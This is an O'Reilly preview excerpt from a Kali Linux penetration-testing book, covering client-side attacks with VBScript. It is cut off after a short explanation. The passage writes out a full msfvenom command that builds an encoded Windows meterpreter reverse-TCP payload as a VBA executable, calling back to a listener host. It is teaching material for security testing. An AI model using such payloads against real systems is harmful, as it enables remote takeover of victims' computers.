O'Reilly logo

Mastering Kali Linux for Advanced Penetration Testing - Second Edition by Vijay Kumar Velu

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

Conducting attacks using VBScript

Visual Basic Scripting (VBScript) edition is an Active Scripting language developed by Microsoft. It was designed to be a lightweight, Windows-native language that could execute small programs. VBScript has been installed by default on every desktop release of Microsoft Windows since Windows 98, making it an excellent target for client-side attacks.

To launch an attack using VBScript, we'll use msfvenom from the command line:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.124 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe  

Note that f designates that the output will be a file which is VBA executable. The output will appear as a text file with two specific parts, as shown ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required